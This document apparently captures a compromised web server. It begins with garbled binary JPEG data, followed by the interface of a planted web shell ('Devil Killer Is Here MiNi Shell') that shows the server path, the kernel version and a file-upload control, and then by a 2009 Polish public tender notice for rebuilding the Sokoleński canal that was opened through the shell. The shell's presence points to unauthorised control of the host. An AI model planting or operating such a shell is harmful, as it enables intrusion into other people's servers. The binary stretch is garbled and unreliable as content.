JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090821/137803-N-2009.html

<p class="kh_header"><b>Piła: ODBUDOWA KANAŁU SOKOLEŃSKIEGO Lokalizacja: gmina Krajenka, Tarnówka, pow. złotowski, woj. wielkopolskie</b><br>
<b>Numer ogłoszenia: 137803 - 2009; data zamieszczenia: 21.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielkopolski Zarząd Melioracji i Urządzeń Wodnych w Poznaniu Rejonowy Oddział w Pile , ul. Motylewska 7, 64-920 Piła, woj. wielkopolskie, tel. 067 2123244, faks 067 2125175.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wzmiuw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBUDOWA KANAŁU SOKOLEŃSKIEGO Lokalizacja: gmina Krajenka, Tarnówka, pow. złotowski, woj. wielkopolskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia: 1 Odbudowa Kanału Sokoleńskiego od km 10+670 do km 21 +326 - L = 10,66 km, - pogłębienie od 0,1 do 0,8 m, - szerokość dna B= 1,0 - 2,0 m, - nachylenie skarp 1:1,5. 2 Wycinka drzew, karczowanie pni, krzaków. 3 Umocnienie stopy skarp opaską z kiszki faszynowej O 20 cm na geowłókninie filtracyjnej L=21 312 mb, - powyżej darniowanie skarp pasem szer. 0,6 m, - wyżej obsiew mieszanką traw. 4 Budowa nowych budowli w miejsce istniejących w km: 10+690,16+030,16+460, 19+760, 20+400, 20 + 770, 20 + 995 ,19 + 775 - 8 szt. - przepust z prefabrykatów żelbetowych 2,0x2,0m, z piętrzeniem hp - 1,1m, L = 8,0m szt. 1, - przepust z prefabrykatów żelbetowych 1,0x1,0m, L = 8 - 9 m ze stopniem H=0,2 m - szt. 2, - przepust z prefabrykatów żelbetowych 1,0x1,0m, L = 8,0m - 1 szt., - przepustu O 0,6m L = 8,0 m - szt. 1, - zastawka typu Z-4-2, B= 1,0m, hp = 1,2 m - 1 szt. 5 Budowa stopnia żelbetowego w km 16 + 295 Kanału ze ścianki szczelnej stalowej, h=0,20 m, 6 Odbudowa istniejących budowli - 3 szt. - w km 12 + 049 odbudowa zastawki B = 1,4 m -1 szt., - w km 13 + 815 odbudowa przepustu B= 1,4 m, L= 8,2m - 1 szt., - w km 15 + 315 odbudowa przepustu B = 1,1 m, L= 4,4m - 1 szt. 7 Odtworzenie odcinków istniejących rowów wylotowych (do Kanału Sokoleńskiego) w rejonie wykonania robót (długość ca 15m) - 64 szt. - umocnieniem skarp darniną pasem szer. 0,5 m, - powyżej obsiew skarp mieszanką traw..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.24.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium 1 Wykonawca przystępujący do przetargu zgodnie z art. 45 pzp jest obowiązany wnieść wadium (tj. przed terminem składania ofert) w wysokości: - 97 000,00zł (słownie: dziewięćdziesiąt siedem tysięcy 00/100zł) obejmujące cały okres związania z ofertą, z tym, że: 1.1 wadium w pieniądzu należy wpłacić przelewem na konto zamawiającego: 17 2030 0045 1110 0000 0078 5790 1.2 wadium w pozostałych formach należy wnieść do księgowości RO WZM i UW w Pile- u p. Anna Urbaś - Główna Księgowa, (przez sekretariat). 2 Wadium może być wniesione w: a. pieniądzu (tylko przelew), b. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym ze zobowiązania kasy jest zawsze zobowiązaniem pieniężnym c. gwarancjach bankowych, d. gwarancjach ubezpieczeniowych, e. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późniejszymi zmianami). 3 Wadium uznaje się za wniesione, jeżeli w wyznaczonym terminie: 3.1 wpłynęło na rachunek wskazany przez Zamawiającego przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego lub 3.2 zostało złożone w księgowości Zamawiającego. 3.3 na dowodzie wpłaty należy podać nazwę przetargu, którego wpłata dotyczy. 3.4 wadium wniesione w formie innej niż pieniądz musi być wystawione na Zamawiającego. Z treści gwarancji (poręczenia) musi wynikać jednoznacznie sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez uprawnionego przedstawiciela Gwaranta. Podpis winien być w sposób umożliwiający jego identyfika-cję, np.. złożony wraz z imienną pieczątką lub ( z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać cel gwarancji i bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego, w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w ustawie Pzp. 4 Oferent, który nie wniósł wadium w formie akceptowanej przez Zamawiającego w wyznaczonym terminie zostanie wykluczony z postępowania zgodnie z art. 24 ust. 2 pkt 4 pzp. ZWROT WADIUM. 5 Zamawiający niezwłocznie zwróci wadium zgodnie z art. 46 pzp, jeżeli : 5.1 upłynął termin związania ofertą; 5.2 zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy; 5.3 zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnię-te lub upłynął termin do ich wnoszenia. 6 Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy: 6.1 który wycofał ofertę przed upływem terminu składania ofert; 6.2 który został wykluczony z postępowania; 6.3 którego oferta została odrzucona. 7 Zamawiający zażąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie pkt 5 i 6, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego. 8 Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. 9 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca: - w odpowiedzi na wezwanie, o którym mowa w art. 26 ust 3 ustawy, nie złożył dokumentów lub oświadczeń, o któ-rych mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie, - którego oferta została wybrana tj. 9.1 odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 9.2 nie wniósł wymaganego zabezpieczenia należytego wyko?nania umowy; 9.3 zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków. 1 Wykonawcą może być osobą fizyczna, osoba prawna lub jednostka organizacyjna nie posiadająca osobowości praw-nej oraz podmioty te występujące wspólnie jako konsorcjum lub grupa podmiotów zrzeszona dla wykonania konkret-nego zamówienia. 1.1 Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia pu-blicznego. 2 W przypadku, gdy o udzielenie zamówienia określonego w niniejszej specyfikacji ubiegają się podmioty występujące wspólnie to każdy podmiot z osobna musi spełniać warunek, że nie podlega wykluczeniu na postawie art. 24 ustawy. pozostałe warunki udziału wymienione poniżej, podmioty muszą spełniać sumarycznie. 3 Wykonawca może powierzyć część lub całość wykonania zamówienia podwykonawcom. W przypadku powierzenia zamówienia podwykonawcom należy wskazać w ofercie część zamówienia, której wykonanie zostanie powierzone podwykonawcom. 4 O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 4.1 Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podst. art. 24 pzp. 4.2 Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obo-wiązek posiadania takich uprawnień. 4.3 Posiadają niezbędną wiedzę i doświadczenie oraz dysponują lub będą dysponowali potencjałem technicznym i osobami zdolnymi do wy?konania zamówienia lub przedstawią pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.: 4.3.1 dysponują lub będą dysponowali sprzętem i narzędziami w asortymencie i ilościach niezbędnych do wy-konywania robót polegających na wykonaniu robót regulacyjnych rzek i kanałów (kształtowaniu prze-kroju podłużnego i porzecznego rzek i kanałów) wraz budową , odbudową i remontem budowli wod-nych 4.3.2 kierownik budowy posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalno-ściach: (w zależności od okresu kiedy zostały wydane) - melioracji wodnych lub - inżynierii wodnej lub w myśl zarządzenia prezesa CUGWiMŻ oraz rolnictwa z dnia 1 września 1964r. w sprawie uprawnień budowlanych w budownictwie specjalnym w zakresie gospodarki wodnej, żeglugi i rolnictwa (dz.B. z dnia 19.09.1964r.) - wodnomelioracyjnej lub - konstrukcyjno-inżynieryjnej, w zakresie budowli hydrotechnicznych w myśl rozporządzenia Ministra GTiOŚ z dnia 20.02.1975r. (Dz.U. Nr 8, poz.46) - konstrukcyjno-budowlanej w zakresie pełnym lub - konstrukcyjno-budowlanej w ograniczonym zakresie -w odniesieniu do osób legitymujących się wykształceniem uzyskanym na kierunku inżynierii środowiska lub w myśl rozporządzenia Ministra Transportu i Budownictwa z dnia 28.04.2006r. w sprawach samodziel-nych funkcji technicznych w budownictwie (Dz. U. 06.83.578 ze zmianami) Ponadto samodzielna funkcje techniczną osoby kierującej robotami (kierownik budowy) może pelnic osoba, której kwalifikacje zawodowe zostały uznane na zasadach określonych w ustawie z dnia 18 mar-ca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z dnia 17.04.2008r. nr 63, poz.394) Zakres posiadanych uprawnień budowlanych musi uprawniać do wykonywania robót i budowli konstrukcyjnych określonych w przedmiocie zamówienia. 4.3.3 zrealizowali w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a je-żeli okres działalności jest krótszy - w tym okresie, zamówienia odpowiadające swoim rodzajem i war-tością robotom budowlanym stanowiącym przedmiot zamówienia tj. - wykonali zamówienia polegające na wykonaniu robót regulacyjnych rzek i kanałów (kształtowaniu przekroju podłużnego i porzecznego rzek i kanałów) wraz budową , odbudową i remontem budowli wodnych - zamówienia odpowiadające swoją wartością Zmawiający uważa - łączną wartość zamówień powyżej 500 tys zł. 4.4 Znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia. 4.4.1 posiadają środki finansowe lub zdolność kredytową w wys. min 500 tys. zł na wykonanie przedmioto-wego zamówienia (Środki finansowe podane w walucie innej niż polskiej, przeliczone będą według kur-sów wyznaczonych na dzień składania ofert z Tabeli kursów średnich walut obcych ogłaszanych przez Narodowy Bank Polski). 4.4.2 Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 4.4.3 Zaakceptują przewidziane warunki fakturowania,płatności: 4.3.1 rozliczenie za wykonane roboty odbywać się będzie fakturami częściowymi stosownie do harmo-nogramu rzeczowo-finansowego, wystawionymi po zakończeniu i odbiorze elementów robót, 4.3.2 wynagrodzenie wykonawcy rozliczone fakturami częściowymi nie może przekroczyć łącznie 90% wynagrodzenia umownego, 4.3.3 w przypadku wykonania robót przez Podwykonawcę, płatność na rzecz Wykonawcy nastąpi po do-starczeniu przez Wykonawcę wraz z fakturą oryginału oświadczenia Podwykonawcy, że otrzymał od Wykonawcy należne mu wynagrodzenie za wykonane roboty 4.3.4 zamawiający przewiduje ilość odbiorów robót i fakturowania,płatności w kolejnych latach: - jeden odbiór i jedno fakturowanie,płatność w 2009r. (wartość robót do wykonania na kwotę 400 tys. zł. słownie: pięćset tysięcy złotych 00/100) ) - cztery odbiory i cztery fakturowania, płatności (kwartalne) w 2010r. - trzy odbiory i trzy fakturowania,płatności w 2011r. (w tym końcowy odbiór i fakturowanie,płatność ) 4.5 Zaakceptują warunki realizacji zamówienia wynikające z projektu umowy (stanowiącej załącznik do niniej-szej specyfikacji). 4.6 Zapewnią 3 (trzy) letni okres gwarancji wykonania zamówienia i 14 (czternaście) dni na wykonanie napraw gwarancyjnych. 4.7 Wymagane jest: 4.7.1 przestrzeganie terminów prowadzenia robót 4.7.2 zachowania okresów ochronnych i warunków prowadzenia robót określonych w decyzjach administra-cyjnych wydanych dla przedmiotowego zadania tj. - decyzja Wojewody Wielkopolskiego z 17.11.2008r. nr WI.V-2.7111-214/08 - pozwolenie na budowę Spełnią pozostałe wymogi SIWZ, złożą wymagane oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu. 4.8 Wykonawca obowiązany jest przedstawić Zamawiającemu polisę ubezpieczenia od zdarzeń losowych (na-stępstw powodzi, deszczu nawalnego, obsunięć ziemi) w terminie nie później niż 7 dni po zawarciu umowy. 5 Z postępowania o udzielenie zamówienia wyklucza się (na podst. art. 24 ust. 1 i 2 pzp): 5.1 wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania, 5.2 wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wy-konawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem są-du, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego; 5.3 wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozło-żenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 5.4 osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestęp-stwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w ce-lu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorgani-zowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 5.5 spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowa-niem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, prze-stępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowe-go; 5.6 spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 5.7 spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za prze-stępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu po-pełnienie przestępstwa lub przestępstwa skarbowego; 5.8 osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodar-czemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 5.9 podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary; 5.10 wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3. Z postępowania o udzielenie zamówienia wyklucza się również wykonawców, którzy: 5.11 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługi-wali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji; przepisu nie stosuje się do wy-konawców, którym udziela się zamówienia na podstawie art. 62 ust. 1 pkt 2 lub art. 67 ust. 1 pkt 1 i 2; 5.12 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania; 5.13 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3; 5.14 nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłu-żenie okresu związania ofertą. 6 Ocena spełnienia warunków udziału: 6.1 Ocena spełnienia warunków udziału wykonawcy w postępowaniu o udzielenie zamówienia publicznego pod-legać będzie na ocenie i badaniu treści oferty i wymaganych dokumentów potwierdzających spełnienie wa-runków udziału jako spełniony lub niespełniony. 6.2 Zamawiający wykluczy oferenta z ubiegania się o zamówienie publiczne w konsekwencji negatywnej oceny prawa oferenta do ubiegania się o zamówienia publiczne lub też braku zdolności albo braku potwierdzenia zdolności do wykonania zamówienia na podstawie art. 24 ustawy. 6.2.1 O wykluczeniu z postępowania zamawiający zawiadomi równocześnie wykonawców, którzy zostali wykluczeni podając uzasadnienie faktyczne i prawne. 6.2.2 Ofertę wykonawcy wykluczonego z postępowania uznaje się za odrzuconą i nie podlega ona dalszemu rozpatrywaniu. 6.3 W toku badania i oceny złożonych ofert, zamawiający: 6.3.1 wezwie wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów, o których mowa w art.25 ust.1 ustawy, lub którzy nie złożyli pełnomoc-nictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art.25 ust.1 ustawy, zawierające błędy lub którzy złożyli pełnomocnictwa, do ich złożenia w wyzna-czonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert. 6.3.2 zgodnie z art. 87 ust.1 ustawy, zamawiający może żądać złożenia wyjaśnień dotyczących treści złożo-nych ofert. 6.3.3 nie będzie prowadził negocjacji z wykonawcą, dotyczących złożonej oferty. 6.3.4 poprawi w ofercie (niezwłocznie zawiadamiając o tym wykonawcę, którego oferta została poprawiona) 1) oczywiste omyłki pisarskie, 2) oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek, 3) inne omyłki polegające na niezgodności oferty ze SIWZ, nie powodujące istotnych zmian w treści oferty. 6.4 Zamawiający odrzuci ofertę na podstawie art. 89 ust.1 ustawy, a złożona przez wykonawcę oferta nie będzie brała udziału w ocenie ofert w oparciu o kryteria oceny ofert, w przypadku gdy: 6.4.1 gdy treść złożonej oferty nie odpowiada treści specyfikacji istotnych warunków zamówienia z zastrze-żeniem art.87 ust.2 pkt 3 ustawy, 6.4.2 oferta jest niezgodna z ustawą, 6.4.3 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, 6.4.4 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia 6.4.5 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia, 6.4.6 błędy w obliczeniu ceny; 6.4.7 wykonawca w terminie 3 dni od dnia otrzymania zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt 3 ustawy, 6.4.8 jest nieważna na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta powinna zawierać następujące dokumenty : 1 Ofertę - wypełniony wzór formularza oferty (załącznik Nr 1 do SIWZ), 2 Oświadczenie wykonawcy w trybie artykułu 22 ust. 1 pzp złożone na formularzu oferta stanowiącym załącznik nr 2 do SIWZ oraz w załączeniu: 2.1 Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospo-darczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospo-darczej, zawierający dane od ostatniej zmiany- wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. (składa także każdy podmiot z osobna, gdy występują wspólnie), 2.2 Upoważnienie do podpisania oferty i występowaniu w imieniu wykonawcy o ile nie wynika ono z ww do-kumentów. 2.3 Aktualne Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego odpowiednio, że wykonawca nie zalega z opłaceniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwol-nienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.(składa także każdy podmiot z osobna, gdy występują wspólnie), 2.4 Aktualne Zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych ZUS lub Kasy Rol-niczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłaceniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwol-nienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, (składa także każdy podmiot z osobna, gdy występują wspólnie), 2.5 